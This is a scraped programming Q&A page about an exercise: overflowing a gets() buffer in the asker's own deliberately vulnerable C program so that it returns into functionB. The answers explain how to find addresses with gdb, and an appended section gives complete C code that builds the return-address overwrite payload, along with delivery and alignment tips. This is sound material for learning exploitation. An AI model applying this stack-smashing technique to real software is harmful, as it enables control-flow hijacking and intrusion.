
buffer overflow exploit change function call

I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over the return pointer, and figure out the address of function B. Is it possible to alter it so that after "x==10" we inject function B's address instead of functionA?

Edit: Is it possible that after fillbuff is called, instead of returning to main, we send it to function B? Any hints are appreciated.

#include <stdio.h>   /* puts, gets, printf */
#include <stdlib.h>  /* exit */

/* gets() was removed from the standard library in C11; if your libc no
   longer declares it, build with -std=gnu99 so the program still compiles. */

/* Deliberately vulnerable: gets() performs no bounds check, so a line longer
   than 14 characters overwrites whatever sits above buff on the stack,
   including the saved frame pointer and the saved return address. */
int fillBuff(int x){
    char buff[15];
    puts("Enter your name");
    gets(buff);
    return(x + 5);
}

void functionA(){
    puts("I dont want to be here");
    exit(0);
}
void functionB(){
    printf("I made it!");
    exit(0);
}


int main(){
    int x;
    x = fillBuff(5);   /* was fillbuff(5): the call must match the definition above */
    if (x == 10){
        functionA();
    }
}

Here is an article that shows how to do it: http://insecure.org/stf/smashstack.html .

Compile your program like this: gcc -g -c program.c (with the -g ) and run gdb ./a.out . After, run the command disas main . You should see the disassembly of your code and how it is organized in your memory. You can replace the main function with any other function and see its code. For more information about disassembly see: https://sourceware.org/gdb/onlinedocs/gdb/Machine-Code.html


Running GDB and disassembling the functions on my computer, the address of functionA() is 0x400679 and the address of functionB() is 40068a . If you look at the disassembly of the main function, there is a call to the address 0x400679 , and what you want is to change it to 40068a . Basically, you have to overflow the buffer in function fillBuff and after reaching the space of the pointer, you have to fill it with the address. The article shows how to do it.

Buffer overflows are undefined behavior in C. Nothing is guaranteed to occur when you overflow a buffer, and as far as I'm aware the language doesn't require a specific memory layout for local variables and/or stored return addresses. In addition to this, some compilers insert stack protectors to make buffer overflow attacks more difficult.

If you want to have defined behavior, you are going to need to look at the assembly produced and figure out what a buffer overflow is going to do. Based on the assembly produced, you can determine the stack layout and the address layout and try to overwrite the return address with a different function's address.

If you're using GCC, the command line option to print out the assembly is -Wa,-al . If you want Intel syntax, add -masm=intel .
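Both answers above describe the same procedure: read the stack layout from the disassembly, find the distance from buff to the saved return address, then feed that many filler bytes followed by functionB's address. The program below is an added example (not code from the question or either answer) that builds such a payload. It assumes an x86-64 build of the question's program without a stack protector and without PIE (for example gcc -g -fno-stack-protector -no-pie -o a.out program.c), so that functionB has the fixed address 0x40068a quoted in the first answer; the 24-byte offset is an assumption standing in for the value you read from your own disas fillBuff. Once the saved return address is overwritten, fillBuff's ret lands in functionB directly, and the if (x == 10) comparison in main is never reached.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ASSUMED layout (verify with `disas fillBuff` in gdb): buff starts
   RET_OFFSET bytes below the saved return address. gcc on x86-64 commonly
   rounds the 15-byte buffer up to 16 bytes and keeps the 8-byte saved rbp
   between it and the return address, giving 24; take the real value from
   the `sub rsp` / `lea` operands in your own build. */
#define RET_OFFSET     24
/* ASSUMED target: the functionB address quoted in the answer above. It was
   taken from that machine's build and will differ on yours (`p functionB`). */
#define FUNCTIONB_ADDR 0x40068aULL

/* Write `offset` filler bytes followed by `target` in little-endian order:
   the payload that replaces the saved return address of fillBuff.
   Returns the payload length, or 0 if `out` cannot hold it. */
size_t build_ret_overwrite(size_t offset, uint64_t target,
                           unsigned char *out, size_t cap)
{
    if (cap < offset + sizeof target)
        return 0;
    memset(out, 'A', offset);                 /* junk up to the saved rip */
    for (size_t i = 0; i < sizeof target; i++)
        out[offset + i] = (unsigned char)(target >> (8 * i)); /* LE bytes */
    return offset + sizeof target;
}

/* gets() copies every byte up to the first '\n', so a payload containing
   0x0a is cut off before the address lands. NUL bytes are fine: gets() does
   not stop on them, which is how the high zero bytes of a 64-bit address
   reach the stack. */
int payload_safe_for_gets(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == '\n')
            return 0;
    return 1;
}

/* Emit the payload so it can be piped into the target: ./payload | ./a.out */
int main(void)
{
    unsigned char payload[64];
    size_t n = build_ret_overwrite(RET_OFFSET, FUNCTIONB_ADDR,
                                   payload, sizeof payload);
    if (n == 0 || !payload_safe_for_gets(payload, n)) {
        fputs("payload cannot be delivered through gets()\n", stderr);
        return 1;
    }
    fwrite(payload, 1, n, stdout);
    putchar('\n');                            /* terminates gets() */
    return 0;
}
```

Two things to check if the jump lands but functionB still crashes. First, the filler also overwrites the saved rbp; functionB sets up its own frame and never returns, so that is harmless here, but it matters for any target that does return. Second, entering functionB through ret rather than call leaves rsp 16-byte aligned instead of 8 mod 16, and printf may then fault on an SSE instruction inside glibc; returning to the byte just after functionB's push rbp (one byte past the address above) restores the expected alignment.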

Notice: the technical posts on this site are licensed under CC BY-SA 4.0; if you republish them, please credit this site's URL or the original address. For any questions contact: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM